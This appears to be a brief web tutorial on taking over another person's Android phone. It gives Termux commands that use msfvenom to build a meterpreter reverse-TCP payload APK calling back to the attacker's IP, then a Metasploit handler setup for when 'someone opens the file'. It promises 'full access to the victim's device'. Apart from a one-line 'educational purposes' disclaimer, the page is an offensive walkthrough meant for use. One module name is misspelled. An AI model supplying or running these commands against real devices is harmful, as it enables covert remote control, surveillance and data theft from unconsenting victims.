How to hack an android using an android

How to hack an android using an android

Disclaimer: Everything on this site is for educational purposes and should not be used for evil.

You will need:

Termux
Metasploit
Your IP

Tutorial:

Execute the following commands in Termux:
pkg update
cd /data/data/com.termux/files/usr/opt/metasploit-framework
msfvenom -p android/meterpreter/reverse_tcp LHOST=[Your IP] LPORT=4444 R> /sdcard/payload.apk
You will make a malicious file in the path /sdcard/payload.apk

When someone opens the file, execute the following commands:
use exploit/milti/handler
set payload android/meterpreter/reverse_tcp
set LHOST [Your IP]
set LPORT 4444
exploit

Now you will obain full access to the victim's device.

Comments